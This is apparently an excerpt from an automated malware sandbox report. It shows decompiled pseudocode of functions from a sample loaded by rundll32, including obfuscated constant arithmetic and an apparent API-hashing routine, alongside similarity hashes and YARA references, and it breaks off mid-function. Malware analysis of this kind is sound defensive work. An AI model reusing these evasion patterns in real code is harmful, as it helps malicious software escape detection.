                                                                                                                    • API ID:
                                                                                                                    • String ID: g|E
                                                                                                                    • API String ID: 0-3824901942
                                                                                                                    • Opcode ID: 434da03f0d83d3a5d6d93c32cdb42b6ac713b1fcc8cbc1b08d0d3376fbdc5032
                                                                                                                    • Instruction ID: 268ccf6a530b7e1814d91c43a2f12000a3172d6705ae434689c4598abd76a48b
                                                                                                                    • Opcode Fuzzy Hash: 434da03f0d83d3a5d6d93c32cdb42b6ac713b1fcc8cbc1b08d0d3376fbdc5032
                                                                                                                    • Instruction Fuzzy Hash: 9F3181766083118FC714DF19C48145BF7E0FF88318F424B6EE889AB251D774EA09CB96
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 003351BB Relevance: 1.3, Strings: 1, Instructions: 81COMMONCrypto
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 93%
                                                                                                                    			E003351BB() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				void* _t72;
				intOrPtr _t83;
				signed int _t87;
				signed int _t88;
				signed int _t89;

				_v28 = _v28 & 0x00000000;
				_v32 = 0x54cf7d;
				_v16 = 0x3835ff;
				_v16 = _v16 >> 0xa;
				_v16 = _v16 * 0x17;
				_v16 = _v16 ^ 0x00095bb8;
				_t72 = 0xe98fb1d;
				_v24 = 0x583681;
				_t87 = 0x44;
				_v24 = _v24 / _t87;
				_v24 = _v24 ^ 0x000eb9f7;
				_v12 = 0x832b1f;
				_v12 = _v12 << 5;
				_v12 = _v12 | 0x242a8544;
				_v12 = _v12 ^ 0x346a2866;
				_v8 = 0x6a77bb;
				_v8 = _v8 >> 0xe;
				_t88 = 0x19;
				_v8 = _v8 / _t88;
				_v8 = _v8 ^ 0x9d9369f0;
				_v8 = _v8 ^ 0x9d908f3a;
				_v20 = 0x4802c8;
				_t89 = 0x21;
				_v20 = _v20 / _t89;
				_v20 = _v20 + 0xffffbfc3;
				_v20 = _v20 ^ 0x000df493;
				do {
					while(_t72 != 0x9835b86) {
						if(_t72 == 0xe98fb1d) {
							_push(_t72);
							_push(_t72);
							 *0x353e04 = E00337FF2(0x134);
							_t72 = 0x9835b86;
							continue;
						}
						goto L5;
					}
					_t83 =  *0x353e04; // 0x0
					E00340001(_v8, _t83 + 0x18, _v20);
					_t72 = 0x7dce4e4;
					L5:
				} while (_t72 != 0x7dce4e4);
				return 1;
			}















                                                                                                                    0x003351c1
                                                                                                                    0x003351c7
                                                                                                                    0x003351ce
                                                                                                                    0x003351d5
                                                                                                                    0x003351e2
                                                                                                                    0x003351ea
                                                                                                                    0x003351f1
                                                                                                                    0x003351f3
                                                                                                                    0x00335202
                                                                                                                    0x00335207
                                                                                                                    0x0033520c
                                                                                                                    0x00335213
                                                                                                                    0x0033521a
                                                                                                                    0x0033521e
                                                                                                                    0x00335225
                                                                                                                    0x0033522c
                                                                                                                    0x00335233
                                                                                                                    0x0033523a
                                                                                                                    0x0033523f
                                                                                                                    0x00335244
                                                                                                                    0x0033524b
                                                                                                                    0x00335252
                                                                                                                    0x0033525c
                                                                                                                    0x00335264
                                                                                                                    0x00335267
                                                                                                                    0x0033526e
                                                                                                                    0x00335275
                                                                                                                    0x00335275
                                                                                                                    0x0033527b
                                                                                                                    0x0033528b
                                                                                                                    0x0033528c
                                                                                                                    0x00335294
                                                                                                                    0x00335299
                                                                                                                    0x00000000
                                                                                                                    0x00335299
                                                                                                                    0x00000000
                                                                                                                    0x0033527b
                                                                                                                    0x003352a0
                                                                                                                    0x003352ac
                                                                                                                    0x003352b2
                                                                                                                    0x003352b4
                                                                                                                    0x003352b4
                                                                                                                    0x003352c1

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: f(j4
                                                                                                                    • API String ID: 0-3086030595
                                                                                                                    • Opcode ID: cad2a4074121ee73dd891200ca9231f0eb50a469cb00c98be246b26cd15ed947
                                                                                                                    • Instruction ID: 866edc9a4cbb2f397eca8f28fa56cf33e52b2cf444855d851d62186532b81edd
                                                                                                                    • Opcode Fuzzy Hash: cad2a4074121ee73dd891200ca9231f0eb50a469cb00c98be246b26cd15ed947
                                                                                                                    • Instruction Fuzzy Hash: BC314771E01219ABCF09DFAAD9855EEBBB1FB84324F208599E505AB250D3B45F45CF80
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00332051 Relevance: 1.3, Strings: 1, Instructions: 80COMMONCrypto
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 94%
                                                                                                                    			E00332051(void* __edx, signed int _a4, intOrPtr _a8) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				void* _t71;
				signed int _t78;
				signed int _t80;
				signed int _t83;
				signed int _t92;
				signed int _t95;
				signed short* _t97;

				_push(_a8);
				_t97 = _a4;
				_push(_t97);
				E003420B9(_t71);
				_v16 = 0x71ca23;
				_v12 = 0x57f692;
				_v8 = 0;
				_v4 = 0;
				_v20 = 0xd3252c;
				_v20 = _v20 + 0x4351;
				_v20 = _v20 + 0xffff5b79;
				_v20 = _v20 ^ 0x00d2c3f6;
				_a4 = 0xbb067e;
				_t83 = 0x11;
				_a4 = _a4 / _t83;
				_a4 = _a4 >> 8;
				_a4 = _a4 ^ 0xac5d3832;
				_a4 = _a4 ^ 0xac5d3334;
				_a4 = 0xab60c2;
				_a4 = _a4 << 0x10;
				_a4 = _a4 ^ 0x910d5570;
				_a4 = _a4 >> 4;
				_a4 = _a4 ^ 0x0f1cf547;
				if( *_t97 != 0) {
					do {
						_t80 = _v20;
						_a4 = 0xbb067e;
						_a4 = _a4 / _t83;
						_a4 = _a4 >> 8;
						_a4 = _a4 ^ 0xac5d3832;
						_a4 = _a4 ^ 0xac5d3334;
						_a4 = 0xab60c2;
						_a4 = _a4 << 0x10;
						_a4 = _a4 ^ 0x910d5570;
						_a4 = _a4 >> 4;
						_a4 = _a4 ^ 0x0f1cf547;
						_t92 = _v20 << _a4;
						_t78 =  *_t97 & 0x0000ffff;
						_t95 = _v20 << _a4;
						if(_t78 >= 0x41 && _t78 <= 0x5a) {
							_t78 = _t78 + 0x20;
						}
						_v20 = _t78;
						_t97 =  &(_t97[1]);
						_v20 = _v20 + _t92;
						_v20 = _v20 + _t95;
						_v20 = _v20 - _t80;
						_t83 = 0x11;
					} while ( *_t97 != 0);
				}
				return _v20;
			}















                                                                                                                    0x00332056
                                                                                                                    0x0033205a
                                                                                                                    0x0033205e
                                                                                                                    0x00332061
                                                                                                                    0x00332066
                                                                                                                    0x00332070
                                                                                                                    0x0033207b
                                                                                                                    0x00332081
                                                                                                                    0x00332085
                                                                                                                    0x0033208d
                                                                                                                    0x00332095
                                                                                                                    0x0033209d
                                                                                                                    0x003320a5
                                                                                                                    0x003320b3
                                                                                                                    0x003320b6
                                                                                                                    0x003320ba
                                                                                                                    0x003320bf
                                                                                                                    0x003320c7
                                                                                                                    0x003320cf
                                                                                                                    0x003320d7
                                                                                                                    0x003320dc
                                                                                                                    0x003320e4
                                                                                                                    0x003320e9
                                                                                                                    0x003320f4
                                                                                                                    0x003320fc
                                                                                                                    0x003320fc
                                                                                                                    0x00332102
                                                                                                                    0x00332110
                                                                                                                    0x00332114
                                                                                                                    0x00332119
                                                                                                                    0x00332121
                                                                                                                    0x00332131
                                                                                                                    0x00332139
                                                                                                                    0x0033213e
                                                                                                                    0x00332146
                                                                                                                    0x0033214b
                                                                                                                    0x00332153
                                                                                                                    0x0033215d
                                                                                                                    0x00332160
                                                                                                                    0x00332165
                                                                                                                    0x0033216c
                                                                                                                    0x0033216c
                                                                                                                    0x0033216f
                                                                                                                    0x00332173
                                                                                                                    0x00332176
                                                                                                                    0x0033217a
                                                                                                                    0x0033217e
                                                                                                                    0x00332184
                                                                                                                    0x00332185
                                                                                                                    0x0033218f
                                                                                                                    0x00332199

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: QC
                                                                                                                    • API String ID: 0-229404352
                                                                                                                    • Opcode ID: f90a2f0d9400246e94e52ce9e9c4602303884de4e781704f0e0226566f48be9f
                                                                                                                    • Instruction ID: 289d63a746fa5c95427ce5b5021f800907c0ac9a7ea9d79ad27eba592b44051c
                                                                                                                    • Opcode Fuzzy Hash: f90a2f0d9400246e94e52ce9e9c4602303884de4e781704f0e0226566f48be9f
                                                                                                                    • Instruction Fuzzy Hash: 533117719083818BD315DF29C48905BBBE0FFC87A8F558E1DF4C9A6225D3B4C688CB56
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0034176B Relevance: 1.3, Strings: 1, Instructions: 75COMMONCrypto
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 88%
                                                                                                                    			E0034176B(void* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _t87;
				signed int _t91;
				signed int _t92;
				signed int _t93;
				void* _t102;
				signed int _t103;

				_v36 = _v36 & 0x00000000;
				_v40 = 0x355323;
				_v24 = 0x6eb9b5;
				_v24 = _v24 + 0x6c21;
				_t102 = __ecx;
				_t91 = 0x64;
				_v24 = _v24 / _t91;
				_v24 = _v24 ^ 0x0005c519;
				_v32 = 0xba69a0;
				_v32 = _v32 << 7;
				_v32 = _v32 ^ 0x5d3c95d0;
				_v20 = 0x99612d;
				_v20 = _v20 | 0x6bf7bfaf;
				_v20 = _v20 + 0x66ac;
				_v20 = _v20 ^ 0x6c036c89;
				_v16 = 0xd72900;
				_v16 = _v16 + 0xffff2462;
				_v16 = _v16 ^ 0xa7b97bfd;
				_v16 = _v16 + 0xffff7578;
				_v16 = _v16 ^ 0xa76084ba;
				_v12 = 0xeb6610;
				_t92 = 0x6f;
				_v12 = _v12 / _t92;
				_v12 = _v12 << 0xf;
				_v12 = _v12 ^ 0x2e835447;
				_v12 = _v12 ^ 0x21f4cf0c;
				_v28 = 0x644f8d;
				_v28 = _v28 << 3;
				_v28 = _v28 << 0xa;
				_v28 = _v28 ^ 0x89f1a004;
				_v8 = 0xbb77ef;
				_t93 = 0x72;
				_v8 = _v8 * 0x3c;
				_v8 = _v8 / _t93;
				_v8 = _v8 << 6;
				_v8 = _v8 ^ 0x18aaba50;
				_t87 = E00340AE0(_v8, _v28);
				_push(_v12);
				_t103 = _t87;
				_push(_t102);
				_push(_t103);
				_push(3);
				E003380E3(_v20, _v16);
				 *((short*)(_t102 + _t103 * 2)) = 0;
				return 0;
			}


















                                                                                                                    0x00341771
                                                                                                                    0x00341777
                                                                                                                    0x0034177e
                                                                                                                    0x00341785
                                                                                                                    0x00341793
                                                                                                                    0x00341795
                                                                                                                    0x0034179a
                                                                                                                    0x0034179f
                                                                                                                    0x003417a6
                                                                                                                    0x003417ad
                                                                                                                    0x003417b1
                                                                                                                    0x003417b8
                                                                                                                    0x003417bf
                                                                                                                    0x003417c6
                                                                                                                    0x003417cd
                                                                                                                    0x003417d4
                                                                                                                    0x003417db
                                                                                                                    0x003417e2
                                                                                                                    0x003417e9
                                                                                                                    0x003417f0
                                                                                                                    0x003417f7
                                                                                                                    0x00341801
                                                                                                                    0x00341806
                                                                                                                    0x0034180b
                                                                                                                    0x0034180f
                                                                                                                    0x00341816
                                                                                                                    0x0034181d
                                                                                                                    0x00341824
                                                                                                                    0x00341828
                                                                                                                    0x0034182c
                                                                                                                    0x00341833
                                                                                                                    0x0034183e
                                                                                                                    0x0034183f
                                                                                                                    0x00341847
                                                                                                                    0x0034184a
                                                                                                                    0x0034184e
                                                                                                                    0x00341861
                                                                                                                    0x00341866
                                                                                                                    0x0034186c
                                                                                                                    0x00341871
                                                                                                                    0x00341872
                                                                                                                    0x00341873
                                                                                                                    0x00341875
                                                                                                                    0x0034187f
                                                                                                                    0x00341888

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: #S5
                                                                                                                    • API String ID: 0-40889119
                                                                                                                    • Opcode ID: d638e8f48ed8eccc1823991200f18c017b773c580a1b9d4be8890f89af7529be
                                                                                                                    • Instruction ID: 3af9c5b45d63f169d198d2bb7e2e579113aa2602f23acf945d2f33c2b3fe8a08
                                                                                                                    • Opcode Fuzzy Hash: d638e8f48ed8eccc1823991200f18c017b773c580a1b9d4be8890f89af7529be
                                                                                                                    • Instruction Fuzzy Hash: EA3133B2D0020AEBCB48DFE5C54AAEEBBB1FB44304F208099D515B6250D7B51B15CF90
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 003509B5 Relevance: 1.3, Strings: 1, Instructions: 71COMMONCrypto
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 96%
                                                                                                                    			E003509B5(void* __ecx, signed int __edx, void* __eflags) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				signed int _t77;
				signed int _t88;
				signed int _t89;

				_v40 = _v40 & 0x00000000;
				_v32 = 4;
				_v52 = 0xab6069;
				_v48 = 0xcf1f96;
				_v44 = 0x29044d;
				_v24 = 0xea6416;
				_v24 = _v24 | 0x7adbff7d;
				_v24 = _v24 ^ 0x5afbff7f;
				_v16 = 0x725236;
				_v16 = _v16 + 0xffff3c91;
				_v16 = _v16 << 7;
				_t88 = 0x2b;
				_v16 = _v16 / _t88;
				_v16 = _v16 ^ 0x015653a2;
				_v12 = 0xbf3984;
				_v12 = _v12 ^ 0x457d3893;
				_t89 = 0x44;
				_v12 = _v12 / _t89;
				_v12 = _v12 + 0x25bc;
				_v12 = _v12 ^ 0x0106bc10;
				_v20 = 0xd655eb;
				_v20 = _v20 | 0x2344b0aa;
				_v20 = _v20 * 0x16;
				_v20 = _v20 ^ 0x147fb4df;
				_v8 = 0x70d8dc;
				_v8 = _v8 + 0xe534;
				_v8 = _v8 ^ 0xb5155b0d;
				_v8 = _v8 >> 7;
				_v8 = _v8 ^ 0x01640b3f;
				_v28 = 0x2d9f47;
				_v28 = _v28 + 0xffffba71;
				_v28 = _v28 ^ 0x002c2593;
				_t77 = E003394EE(_v16, __ecx, _v24 | __edx, __ecx,  &_v36, _v20, _v8,  &_v32, _v28);
				asm("sbb eax, eax");
				return  ~_t77 & _v36;
			}


















                                                                                                                    0x003509bb
                                                                                                                    0x003509bf
                                                                                                                    0x003509c6
                                                                                                                    0x003509cd
                                                                                                                    0x003509d4
                                                                                                                    0x003509db
                                                                                                                    0x003509e2
                                                                                                                    0x003509e9
                                                                                                                    0x003509f0
                                                                                                                    0x003509f7
                                                                                                                    0x003509fe
                                                                                                                    0x00350a09
                                                                                                                    0x00350a12
                                                                                                                    0x00350a17
                                                                                                                    0x00350a1e
                                                                                                                    0x00350a25
                                                                                                                    0x00350a2f
                                                                                                                    0x00350a32
                                                                                                                    0x00350a35
                                                                                                                    0x00350a3c
                                                                                                                    0x00350a43
                                                                                                                    0x00350a4a
                                                                                                                    0x00350a55
                                                                                                                    0x00350a5b
                                                                                                                    0x00350a62
                                                                                                                    0x00350a69
                                                                                                                    0x00350a70
                                                                                                                    0x00350a77
                                                                                                                    0x00350a7b
                                                                                                                    0x00350a82
                                                                                                                    0x00350a89
                                                                                                                    0x00350a90
                                                                                                                    0x00350ab3
                                                                                                                    0x00350abd
                                                                                                                    0x00350ac7

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 6Rr
                                                                                                                    • API String ID: 0-3911282678
                                                                                                                    • Opcode ID: b16a44260abee8cda7f594ea7713937b30baf920b598495c2ffeaef3aed9b357
                                                                                                                    • Instruction ID: aa369f70871c2a83a6adede1090f4de1626a3b026dd01c03583cc8ccc2b0eed9
                                                                                                                    • Opcode Fuzzy Hash: b16a44260abee8cda7f594ea7713937b30baf920b598495c2ffeaef3aed9b357
                                                                                                                    • Instruction Fuzzy Hash: 3A31E1B1D1021EEBDB04CFA6C94A9EEFBB5FB44318F108599D121B6250D3B85B49CF90
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00348519 Relevance: 1.3, Strings: 1, Instructions: 49COMMONCrypto
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 91%
                                                                                                                    			E00348519(void* __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				void* _t55;

				_push(_a4);
				_push(__ecx);
				E003420B9(_t55);
				_v8 = 0x519131;
				_v8 = _v8 ^ 0xec4619ea;
				_v8 = _v8 + 0x48c3;
				_v8 = _v8 ^ 0x9760daa2;
				_v8 = _v8 ^ 0x7b7f7884;
				_v16 = 0xb689a0;
				_v16 = _v16 + 0x133d;
				_v16 = _v16 ^ 0x00b72bb6;
				_v12 = 0xec38eb;
				_v12 = _v12 * 0x68;
				_v12 = _v12 | 0x70f3e2c1;
				_v12 = _v12 + 0xd290;
				_v12 = _v12 ^ 0x7ff36ca2;
				_v12 = 0x452aa4;
				_v12 = _v12 ^ 0xbb670255;
				_v12 = _v12 >> 1;
				_v12 = _v12 * 0x2d;
				_v12 = _v12 ^ 0x7280165f;
				_v24 = 0xb68a33;
				_v24 = _v24 + 0xffff2941;
				_v24 = _v24 ^ 0x00b92c3b;
				_v12 = 0x340add;
				_v12 = _v12 | 0xd5e1d7f7;
				_v12 = _v12 ^ 0xd5f6168b;
				_v20 = 0x853d17;
				_v20 = _v20 + 0xcd4d;
				_v20 = _v20 ^ 0x00837917;
				return E0033A30C(_v12, _a4, E00331DB9(__ecx), _v20);
			}









                                                                                                                    0x0034851f
                                                                                                                    0x00348523
                                                                                                                    0x00348524
                                                                                                                    0x00348529
                                                                                                                    0x00348530
                                                                                                                    0x00348537
                                                                                                                    0x0034853e
                                                                                                                    0x00348545
                                                                                                                    0x0034854c
                                                                                                                    0x00348553
                                                                                                                    0x0034855a
                                                                                                                    0x00348561
                                                                                                                    0x0034856c
                                                                                                                    0x0034856f
                                                                                                                    0x00348576
                                                                                                                    0x0034857d
                                                                                                                    0x00348584
                                                                                                                    0x0034858b
                                                                                                                    0x00348592
                                                                                                                    0x00348599
                                                                                                                    0x0034859c
                                                                                                                    0x003485a3
                                                                                                                    0x003485aa
                                                                                                                    0x003485b1
                                                                                                                    0x003485b8
                                                                                                                    0x003485bf
                                                                                                                    0x003485c6
                                                                                                                    0x003485cd
                                                                                                                    0x003485d4
                                                                                                                    0x003485db
                                                                                                                    0x00348605

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 8
                                                                                                                    • API String ID: 0-719543824
                                                                                                                    • Opcode ID: 12fec3ad41cc48b82a22f75e272f04b08121d484bde9b0f7791330edfee38c34
                                                                                                                    • Instruction ID: 80a4a72d3515bc1bdd05ce68c650cfc2bd5deffa9b91bf86d2451ecc685c90c6
                                                                                                                    • Opcode Fuzzy Hash: 12fec3ad41cc48b82a22f75e272f04b08121d484bde9b0f7791330edfee38c34
                                                                                                                    • Instruction Fuzzy Hash: 6A21B2B6C00209EBCF49DFE5CA8689EBFB5FF40318F608189E411BA261D3B54B54DB95
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 100323E2 Relevance: .4, Instructions: 384COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                                                                                                    • Instruction ID: 1bfcaf43c27c81d10410876f8fc1d5c1a29ddf16da4e3393733b86403839c423
                                                                                                                    • Opcode Fuzzy Hash: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                                                                                                    • Instruction Fuzzy Hash: 2CD15C73C0E9F70E8377C12E506866AEAB2AFC298271FC3E1DCD42F689D2265D1195D0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 10031FC2 Relevance: .4, Instructions: 378COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                                                                                                                    • Instruction ID: 82a22fea4dee095689a33f7c41869eea601d71afe1f9cce3cb1ebeaf0be2af07
                                                                                                                    • Opcode Fuzzy Hash: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                                                                                                                    • Instruction Fuzzy Hash: 0BD16A73C0E9B70E8376C12E54A866BEAB2AFC158271FC3A1DCD02F689D6269D0595D0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 10031BB6 Relevance: .4, Instructions: 361COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                                                                                                                    • Instruction ID: 4b1b82cb2a868ffe554c354e232f2920846bc0ab95f092044db9cceed5b195f9
                                                                                                                    • Opcode Fuzzy Hash: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                                                                                                                    • Instruction Fuzzy Hash: 3BC17F77C1E9B70E8377C12E44A85AAEAB2AFC659271FC3E1CCD43F689D2265D0185D0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 100317E2 Relevance: .4, Instructions: 351COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                                                                                                                    • Instruction ID: b56b4bdd56439ea2f6f9f3f119f05c546accd6e672066d429c0e352e3a467874
                                                                                                                    • Opcode Fuzzy Hash: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                                                                                                                    • Instruction Fuzzy Hash: 58C18273D0E9B70E8377C12E44A85AAEEB2AFC558271FC3E1CCD42F289E6265D0595D0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00334346 Relevance: .2, Instructions: 173COMMONCrypto
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 90%
                                                                                                                    			E00334346(intOrPtr* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v4;
				intOrPtr _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
